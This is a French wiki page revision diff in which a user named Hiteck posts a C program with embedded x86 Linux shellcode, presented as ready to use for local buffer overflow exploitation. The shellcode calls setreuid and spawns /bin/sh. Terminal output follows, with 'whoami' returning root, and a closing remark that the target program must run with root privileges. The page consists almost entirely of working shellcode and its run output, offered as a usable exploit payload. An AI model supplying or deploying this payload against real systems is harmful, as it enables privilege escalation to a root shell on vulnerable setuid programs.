« Hiteck » : différence entre les versions
Aucun résumé des modifications |
Aucun résumé des modifications |
||
(18 versions intermédiaires par le même utilisateur non affichées) | |||
Ligne 1 : | Ligne 1 : | ||
<p> | <p> | ||
<b><u>Mercredi 23 juin 2010</u></b> | |||
<br /><br /> | |||
#include <stdio.h><br /> | Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D | ||
<br /><br /> | |||
hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c<br /> | |||
#include <stdio.h><br /><br /> | |||
char shellcode[] = "\x31\ | char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br /><br /> | ||
int main(void)<br /> | int main(void)<br /> | ||
{<br /> | {<br /> | ||
printf(" | printf("\n[+] Exploit shellcode remote");<br /> | ||
printf(" | printf("\n[+] Codé par hit3ck");<br /> | ||
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));<br /> | |||
(*(void(*)()) shellcode)();<br /> | (*(void(*)()) shellcode)();<br /> | ||
} | }<br /> | ||
hiteck@hiteck:~/Bureau/ | hiteck@hiteck:~/Bureau/Programmation$ ./exploit<br /><br /> | ||
[+] Exploit shellcode remote<br /> | |||
[+] Codé par hit3ck<br /> | |||
[+] Taille: 33<br /> | |||
# whoami<br /> | |||
root<br /> | |||
# echo "Local exploit shellcode remote :-D"<br /> | |||
Local exploit shellcode remote :-D<br /> | |||
# exit<br /> | |||
hiteck@hiteck:~/Bureau/Programmation$ <br /><br /> | |||
Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.<br /><br /> | |||
hiteck@hiteck:~/Bureau/ | |||
<br /><br / | |||
</p> | </p> |
Dernière version du 11 juin 2014 à 18:57
Mercredi 23 juin 2010
Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D
hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c
#include <stdio.h>
char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void)
{
printf("\n[+] Exploit shellcode remote");
printf("\n[+] Codé par hit3ck");
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/Programmation$ ./exploit
[+] Exploit shellcode remote
[+] Codé par hit3ck
[+] Taille: 33
# whoami
root
# echo "Local exploit shellcode remote :-D"
Local exploit shellcode remote :-D
# exit
hiteck@hiteck:~/Bureau/Programmation$
Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.